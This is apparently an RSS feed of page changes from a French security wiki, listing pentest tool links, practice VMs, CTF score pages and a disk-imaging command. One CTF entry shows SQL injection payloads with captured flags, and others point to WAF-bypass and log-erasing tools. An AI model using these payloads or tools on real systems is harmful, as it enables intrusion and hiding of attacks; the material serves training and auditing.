        <link>http://wiki.zenk-security.com/doku.php?id=compilation_de_ressources_outils_reseau&amp;rev=1587748067&amp;do=diff</link>
        <description>🛠 &lt;https://www.putty.org/&gt; PuTTY - is an SSH and telnet client, developed originally by Simon Tatham.

🛠 &lt;https://nmap.org/&gt; nmap - is a free and open source (license) utility for network discovery and security auditing.

🛠 &lt;https://github.com/rkhal101/nmapAutomator&gt; The main goal for this script is to automate all of the process of recon/enumeration that is run every time, and instead focus our attention on real pen testing.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=compilation_de_ressources_outils_web&amp;rev=1595482267&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-07-23T07:31:07+02:00</dc:date>
        <title>compilation_de_ressources_outils_web</title>
        <link>http://wiki.zenk-security.com/doku.php?id=compilation_de_ressources_outils_web&amp;rev=1595482267&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;



Phase de reconnaissance, cartographie et d’énumération:

	*  Des outils pour automatiser Google Hacking Database
	*  [3] Des outils pour scanner des fichiers et dossiers intéressant
	*  Des outils pour faire une cartographie d'un site</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=compilation_de_vm_web_vulnerables&amp;rev=1582755061&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-02-26T23:11:01+02:00</dc:date>
        <title>compilation_de_vm_web_vulnerables</title>
        <link>http://wiki.zenk-security.com/doku.php?id=compilation_de_vm_web_vulnerables&amp;rev=1582755061&amp;do=diff</link>
        <description>Applications, serveurs et sites Web vulnérables

Ce qui suit est une collection de serveurs vulnérables (VM) ou de sites Web que vous pouvez utiliser pour pratiquer vos compétences (classés par ordre alphabétique).

	*  bWAPP : &lt;https://sourceforge.net/projects/bwapp/files/bWAPP&gt;
	*   Damn Vulnerable ARM Router (DVAR): &lt;http://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html&gt;
	*  Damn Vulnerable iOS Application (DVIA): &lt;http://damnvulnerableiosapp.com&gt;
	*  Damn Vulnerable Web App…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=config_files&amp;rev=1572001198&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-25T12:59:58+02:00</dc:date>
        <title>config_files</title>
        <link>http://wiki.zenk-security.com/doku.php?id=config_files&amp;rev=1572001198&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 [dotenv-linter](&lt;https://github.com/wemake-services/dotenv-linter&gt;) - Linting dotenv files like a charm.

🛠 [gixy](&lt;https://github.com/yandex/gixy&gt;) - a tool to analyze Nginx configuration. The main goal is to prevent misconfiguration and automate flaw detection.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=configurer_burpsuite_sur_genymotion_emulateur_android&amp;rev=1592726170&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-06-21T09:56:10+02:00</dc:date>
        <title>configurer_burpsuite_sur_genymotion_emulateur_android</title>
        <link>http://wiki.zenk-security.com/doku.php?id=configurer_burpsuite_sur_genymotion_emulateur_android&amp;rev=1592726170&amp;do=diff</link>
        <description>Mettre burpsuite comme proxy

mettre le proxy 10.0.3.2 (ip par défaut du host pour genymotion)

port 8080

Installer le certificat de burpsuite

prérequis : votre téléphone doit avoir un code pin et doit avoir un une application pour renomer un fichier (file manager) et firefox</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=copie_support&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>copie_support</title>
        <link>http://wiki.zenk-security.com/doku.php?id=copie_support&amp;rev=1491744837&amp;do=diff</link>
        <description>commande dd

dd if=/dev/sdx of=image.dd bs=512 conv=noerrors,sync

Cette commande va copier l'intégralité du disque sdx dans le fichier image.dd.

	*  bs=512,  taille des blocks du disque, si non mentionnée, dd prend la valeur de la taille des blocks par défaut.
	*  conv=noerrors,sync dd ne s'arrêtera pas en cas d'erreur de lecture sur un block. Après plusieurs essais, il s'avère que dd s'interrompt en cas de block défectueux sur un disque en panne... Doit-on différencier un block défectueux d'u…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=crypto-monnaie&amp;rev=1610191174&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2021-01-09T12:19:34+02:00</dc:date>
        <title>crypto-monnaie</title>
        <link>http://wiki.zenk-security.com/doku.php?id=crypto-monnaie&amp;rev=1610191174&amp;do=diff</link>
        <description>[Forage de l'ethereum avec 5  GPU]

Les crypto-monnais se réfèrent à un certain nombre de protocoles qui peuvent être utilisés pour stocker des informations financières sur Internet sans avoir besoin d'un arbitrage central ou un service de réglementation, comme une banque ou un gouvernement. Cela est possible en utilisant la cryptographie à clé publique/privée, basé sur une communication P2P, et un registre public distribué appelé blockchain. Les principales crypto-monnaies actuelles (Novembre 2…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=csaw2012_quals&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>csaw2012_quals</title>
        <link>http://wiki.zenk-security.com/doku.php?id=csaw2012_quals&amp;rev=1491744837&amp;do=diff</link>
        <description>Trivia

Trivia1 100 pts

Trivia2 100 pts

Trivia3 100 pts

Trivia4 100 pts

Trivia5 100 pts

Recon

Jordan Wiens 100 pts

Jeff Jarmoc 100 pts

Julian Cohen 100 pts

Dan Guido 400 pts

Yoda 400 pts

Web

c4ca4238a0b923820dcc509a6f75849b 100 pts

c81e728d9d4c2f636f067f89cc14862c 200 pts</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=csaw_ctf_2013_quals&amp;rev=1379974062&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2013-09-24T00:07:42+02:00</dc:date>
        <title>csaw_ctf_2013_quals</title>
        <link>http://wiki.zenk-security.com/doku.php?id=csaw_ctf_2013_quals&amp;rev=1379974062&amp;do=diff</link>
        <description>Trivia

Trivia1 50 pts

Trivia2 50 pts

Trivia3 50 pts

Trivia4 50 pts

Trivia5 50 pts

Recon

hystorypeats 100 pts

Web

Reversing

DotNet 100 pts

keygenme 400 pts

Exploitation

Misc

Crypto</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ctf_mssis_ctf&amp;rev=1526287454&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-05-14T10:44:14+02:00</dc:date>
        <title>ctf_mssis_ctf</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ctf_mssis_ctf&amp;rev=1526287454&amp;do=diff</link>
        <description>root@kali:~/Downloads# python client.py 
[+] Test level1 ...
Welcome on level 1 !

Welcome b'admin” OR “1”=“1', the flag is 'ESE{n0T_S0_H4rd_R1gHt_!?}'

[+] Test level2 ...
Welcome on level 2 !

Citation #123 union SELECT * fROM flag:	ESE{7d2f9e9beab248febaf5bddffc3a39a4}</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ctf_thc_toulouse_hacking_convention&amp;rev=1523311384&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-04-10T00:03:04+02:00</dc:date>
        <title>ctf_thc_toulouse_hacking_convention</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ctf_thc_toulouse_hacking_convention&amp;rev=1523311384&amp;do=diff</link>
        <description>*  web 1 (202pts) : le writeup de BFF ici : &lt;https://github.com/Beers4Flags/writeups/tree/master/2018/Thcon/Web/200&gt;

On a utilisé la même méthode en reversant le custom sha1 du script.

	*  réseau 1 : (50pts) : &lt;https://github.com/Beers4Flags/writeups/tree/master/2018/Thcon/Network/50&gt;
	*  forensic 1 (400pts): ci-dessous.
	*  reverse 1 (100pts) : c'est mon collègue, patrice qui l'a fait, j'ai pas d'info dessus pour l'instant.
	*  misc (100pts) : un chall ou il fallait remettre en ordre un papie…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=dctf_qual_2014&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>dctf_qual_2014</title>
        <link>http://wiki.zenk-security.com/doku.php?id=dctf_qual_2014&amp;rev=1491744837&amp;do=diff</link>
        <description>Quest

	*  QUEST 100
	*  QUEST 200
	*  QUEST 300
	*  QUEST 400

Web

	*  WEB 100
	*  WEB 200
	*  WEB 300
	*  WEB 400

Network

	*  NETWORK 100
	*  NETWORK 200
	*  NETWORK 300
	*  NETWORK 400

Exploit

	*  EXPLOIT 100
	*  EXPLOIT 200
	*  EXPLOIT 300
	*  EXPLOIT 400</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=dell_personnage_public&amp;rev=1516575918&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-22T00:05:18+02:00</dc:date>
        <title>dell_personnage_public</title>
        <link>http://wiki.zenk-security.com/doku.php?id=dell_personnage_public&amp;rev=1516575918&amp;do=diff</link>
        <description>Michael Dell est le fondateur et le président de Dell Computers, une société spécialisée dans les clones IBM.

Lien externe

Histoire de Dell</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=dennis_ritchie&amp;rev=1557686180&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-05-12T20:36:20+02:00</dc:date>
        <title>dennis_ritchie</title>
        <link>http://wiki.zenk-security.com/doku.php?id=dennis_ritchie&amp;rev=1557686180&amp;do=diff</link>
        <description>Dennis MacAlistair Ritchie, né le 9 septembre 1941 à Bronxville dans l'État de New York et mort le 12 octobre 20111 à Berkeley Heights dans le New Jersey, est un des pionniers de l'informatique moderne, inventeur du langage C et codéveloppeur de Unix. Il est parfois désigné par dmr, son adresse électronique aux Laboratoires Bell.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_audit_le_dns&amp;rev=1577879878&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-01-01T12:57:58+02:00</dc:date>
        <title>des_outils_pour_audit_le_dns</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_audit_le_dns&amp;rev=1577879878&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 DNSSpy Monitor, validate and verify your DNS configurations &lt;https://dnsspy.io/&gt;

🛠 &lt;https://github.com/farrokhi/dnsdiag&gt; dnsdiag - is a DNS diagnostics and performance measurement tools.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_automatiser_google_hacking_database&amp;rev=1572355129&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-29T14:18:49+02:00</dc:date>
        <title>des_outils_pour_automatiser_google_hacking_database</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_automatiser_google_hacking_database&amp;rev=1572355129&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 Uses advanced search operators to find juicy information about target websites &lt;https://pentest-tools.com/information-gathering/google-hacking&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_du_post_exploitation&amp;rev=1571831772&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-23T13:56:12+02:00</dc:date>
        <title>des_outils_pour_du_post_exploitation</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_du_post_exploitation&amp;rev=1571831772&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 post-exploitation framework &lt;https://github.com/nil0x42/phpsploit&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_effacer_ses_traces_sur_un_serveur&amp;rev=1571832274&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-23T14:04:34+02:00</dc:date>
        <title>des_outils_pour_effacer_ses_traces_sur_un_serveur</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_effacer_ses_traces_sur_un_serveur&amp;rev=1571832274&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 Clear all your logs in [linux/windows] servers 🛡️
 &lt;https://github.com/Rizer0/Log-killer&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_exploiter_les_xxe&amp;rev=1595482399&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-07-23T07:33:19+02:00</dc:date>
        <title>des_outils_pour_exploiter_les_xxe</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_exploiter_les_xxe&amp;rev=1595482399&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 Uility to embed XXE and XSS payloads in docx,odt,pptx,etc - any documents that is a zip archive with bunch of xml files inside &lt;https://github.com/whitel1st/docem&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_faire_des_tests_d_autorisation&amp;rev=1571831644&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-23T13:54:04+02:00</dc:date>
        <title>des_outils_pour_faire_des_tests_d_autorisation</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_faire_des_tests_d_autorisation&amp;rev=1571831644&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 Automatic authorization enforcement detection extension for burp suite written in Jython developed by Barak Tawily in order to ease application security people work and allow them perform an automatic authorization tests &lt;https://github.com/Quitten/Autorize&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_faire_un_audit_sur_la_cryptographie&amp;rev=1590133204&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-05-22T09:40:04+02:00</dc:date>
        <title>des_outils_pour_faire_un_audit_sur_la_cryptographie</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_faire_un_audit_sur_la_cryptographie&amp;rev=1590133204&amp;do=diff</link>
        <description>Heartbleed test

&lt;https://filippo.io/heartbleed/&gt;

CVE-2016-2107

&lt;https://filippo.io/cve-2016-2107/&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_faire_une_cartographie_d_un_site&amp;rev=1599420706&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-09-06T21:31:46+02:00</dc:date>
        <title>des_outils_pour_faire_une_cartographie_d_un_site</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_faire_une_cartographie_d_un_site&amp;rev=1599420706&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 Unfurl - Extract and Visualize Data from URLs &lt;https://github.com/obsidianforensics/unfurl&gt;

🛠 bscan is a command-line utility to perform active information gathering and service enumeration.  &lt;https://github.com/welchbj/bscan/blob/master/README.md&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_la_deserialisation&amp;rev=1600641189&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-09-21T00:33:09+02:00</dc:date>
        <title>des_outils_pour_la_deserialisation</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_la_deserialisation&amp;rev=1600641189&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

PHP

🛠 PHPGGC 	&lt;https://github.com/ambionics/phpggc&gt;

JAVA

🛠 A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization . &lt;https://github.com/frohoff/ysoserial&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_outre_passer_les_waf&amp;rev=1572463048&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-30T20:17:28+02:00</dc:date>
        <title>des_outils_pour_outre_passer_les_waf</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_outre_passer_les_waf&amp;rev=1572463048&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 Add headers to all Burp requests to bypass some WAF products
 &lt;https://github.com/codewatchorg/bypasswaf&gt;

🛠 XORpass is an encoder to bypass WAF filters using XOR operations. &lt;https://github.com/devploit/XORpass&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_race_condition&amp;rev=1591014793&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-06-01T14:33:13+02:00</dc:date>
        <title>des_outils_pour_race_condition</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_race_condition&amp;rev=1591014793&amp;do=diff</link>
        <description>Race the Web 	&lt;https://github.com/insp3ctre/race-the-web&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_des_cms&amp;rev=1671005636&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2022-12-14T09:13:56+02:00</dc:date>
        <title>des_outils_pour_scanner_des_cms</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_des_cms&amp;rev=1671005636&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

Wordpress

🛠 online free scan &lt;https://hackertarget.com/wordpress-security-scan/&gt;

🛠 wpxf - WordPress Exploit Framework &lt;https://github.com/rastating/wordpress-exploit-framework&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_des_fichiers_et_dossiers_interessant&amp;rev=1577879843&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-01-01T12:57:23+02:00</dc:date>
        <title>des_outils_pour_scanner_des_fichiers_et_dossiers_interessant</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_des_fichiers_et_dossiers_interessant&amp;rev=1577879843&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 Interesting Files Scanner extends Burp Suite's active scanner, with scans for interesting files and directories.  &lt;https://github.com/modzero/interestingFileScanner&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_des_webapp_et_des_services_web&amp;rev=1591015127&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-06-01T14:38:47+02:00</dc:date>
        <title>des_outils_pour_scanner_des_webapp_et_des_services_web</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_des_webapp_et_des_services_web&amp;rev=1591015127&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 AuthMatrix is a Burp Suite extension that provides a simple way to test authorization in web applications and web services. &lt;https://github.com/SecurityInnovation/AuthMatrix&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_des_xss&amp;rev=1591000867&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-06-01T10:41:07+02:00</dc:date>
        <title>des_outils_pour_scanner_des_xss</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_des_xss&amp;rev=1591000867&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

XSS online scanner

🛠 Find xss online &lt;https://pentest-tools.com/website-vulnerability-scanning/xss-scanner-online#&gt;

🛠 Find xss online &lt;http://xss-scanner.com/&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_et_exploiter_des_injections_de_template&amp;rev=1572110054&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-26T19:14:14+02:00</dc:date>
        <title>des_outils_pour_scanner_et_exploiter_des_injections_de_template</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_et_exploiter_des_injections_de_template&amp;rev=1572110054&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 Server-Side Template Injection and Code Injection Detection and Exploitation Tool &lt;https://github.com/epinna/tplmap&gt;

🛠 Explaining Server Side Template Injections &lt;https://0x00sec.org/t/explaining-server-side-template-injections/16297&gt;
&lt;https://portswigger.net/research/server-side-template-injection&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_et_exploiter_des_lfi&amp;rev=1593107679&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-06-25T19:54:39+02:00</dc:date>
        <title>des_outils_pour_scanner_et_exploiter_des_lfi</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_et_exploiter_des_lfi&amp;rev=1593107679&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 fimap project  &lt;https://github.com/kurobeats/fimap&gt;

🛠 LFISuite	&lt;https://github.com/D35m0nd142/LFISuite&gt;

🛠 A File Inclusion &amp; Directory Traversal fuzzing, enumeration &amp; exploitation tool.
&lt;https://github.com/chrispetrou/FDsploit/blob/master/README.md&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_les_misconfiguration&amp;rev=1591015018&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-06-01T14:36:58+02:00</dc:date>
        <title>des_outils_pour_scanner_les_misconfiguration</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_les_misconfiguration&amp;rev=1591015018&amp;do=diff</link>
        <description>CORStest 	&lt;https://github.com/RUB-NDS/CORStest&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_les_ssrf&amp;rev=1604076834&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-10-30T17:53:54+02:00</dc:date>
        <title>des_outils_pour_scanner_les_ssrf</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_les_ssrf&amp;rev=1604076834&amp;do=diff</link>
        <description>ssrfDetector 	&lt;https://github.com/JacobReynolds/ssrfDetector&gt;

ground-control 	&lt;https://github.com/jobertabma/ground-control&gt;

ssrf-sheriff  &lt;https://github.com/teknogeek/ssrf-sheriff&gt;

SSRFmap &lt;https://github.com/swisskyrepo/SSRFmap&gt;

Gopherus &lt;https://github.com/tarunkant/Gopherus&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_les_xxe&amp;rev=1595482432&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-07-23T07:33:52+02:00</dc:date>
        <title>des_outils_pour_scanner_les_xxe</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_les_xxe&amp;rev=1595482432&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 oxml_xxe 	&lt;https://github.com/BuffaloWill/oxml_xxe/&gt;

🛠 XXE Injector 	&lt;https://github.com/enjoiz/XXEinjector&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_si_le_site_est_victime_de_malware&amp;rev=1571831688&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-23T13:54:48+02:00</dc:date>
        <title>des_outils_pour_scanner_si_le_site_est_victime_de_malware</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_si_le_site_est_victime_de_malware&amp;rev=1571831688&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 Malwoverview.py is a first response tool to perform an initial and quick triage in a directory containing malware samples, specific malware sample, suspect URL and domains. Additionally, it allows to download and send samples to main online sandboxes. &lt;https://github.com/alexandreborges/malwoverview&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_ssl&amp;rev=1591301880&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-06-04T22:18:00+02:00</dc:date>
        <title>des_outils_pour_scanner_ssl</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_ssl&amp;rev=1591301880&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 sslscan - tests SSL/TLS enabled services to discover supported cipher suites. &lt;https://github.com/rbsec/sslscan&gt;

🛠 testssl.sh - testing TLS/SSL encryption anywhere on any port.&lt;https://github.com/drwetter/testssl.sh&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_un_scan_complet&amp;rev=1618610994&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2021-04-17T00:09:54+02:00</dc:date>
        <title>des_outils_pour_un_scan_complet</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_outils_pour_un_scan_complet&amp;rev=1618610994&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 Nuclei is a fast tool for configurable targeted vulnerability scanning based on templates offering massive extensibility and ease of use. 
&lt;https://github.com/projectdiscovery/nuclei&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_ressources_et_outils_pour_l_exploitation_des_browsers&amp;rev=1574268414&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-11-20T17:46:54+02:00</dc:date>
        <title>des_ressources_et_outils_pour_l_exploitation_des_browsers</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_ressources_et_outils_pour_l_exploitation_des_browsers&amp;rev=1574268414&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 I have just presented my first ever talk, “The Art of WebKit Exploitation” at BSides Delhi 2019 — for those not at the conference, it's a talk about everything I've learnt exploiting the WebKit browser engine. &lt;http://blog.umangis.me/the-art-of-webkit-exploitation/&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=des_ressources_et_outils_pour_les_injections_sql&amp;rev=1590763555&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-05-29T16:45:55+02:00</dc:date>
        <title>des_ressources_et_outils_pour_les_injections_sql</title>
        <link>http://wiki.zenk-security.com/doku.php?id=des_ressources_et_outils_pour_les_injections_sql&amp;rev=1590763555&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

SQLi scanner en ligne avec version gratuite

🛠 &lt;https://pentest-tools.com/website-vulnerability-scanning/sql-injection-scanner-online#&gt;

 Les outils 
🛠 An automatic SQL Injection tool which takes advantage of ~DorkNet~ Googler, Ddgr, WhatWaf and sqlmap. &lt;https://github.com/sheldoncoupeheure/AutoSQLi&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=destruction_de_donnees&amp;rev=1557678223&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-05-12T18:23:43+02:00</dc:date>
        <title>destruction_de_donnees</title>
        <link>http://wiki.zenk-security.com/doku.php?id=destruction_de_donnees&amp;rev=1557678223&amp;do=diff</link>
        <description>La destruction de données est “l'art” de diverses méthodes pour effacer en toute sécurité des fichiers sur un disque dur. Pour la destruction des données, il est préférable d’effacer l’ensemble du lecteur, car la plupart des systèmes d’exploitation divulgueront les détails de vos fichiers (par exemple, des copies temporaires de votre document, des mentions dans les listes les plus récemment utilisées, des fichiers journaux, des entrées de registre, un historique des commandes, etc...)…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=disque_dur&amp;rev=1510514045&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-12T20:14:05+02:00</dc:date>
        <title>disque_dur</title>
        <link>http://wiki.zenk-security.com/doku.php?id=disque_dur&amp;rev=1510514045&amp;do=diff</link>
        <description>*  MBR
	*  Outils d'analyses</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=disque_dur_externe&amp;rev=1516582176&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-22T01:49:36+02:00</dc:date>
        <title>disque_dur_externe</title>
        <link>http://wiki.zenk-security.com/doku.php?id=disque_dur_externe&amp;rev=1516582176&amp;do=diff</link>
        <description>Guide d'achat d'un disque dur externe

	*  Acheter un disque dur interne
	*  Acheter un boîtier externe a 15€

Pourquoi suivre les instructions ci-dessus?

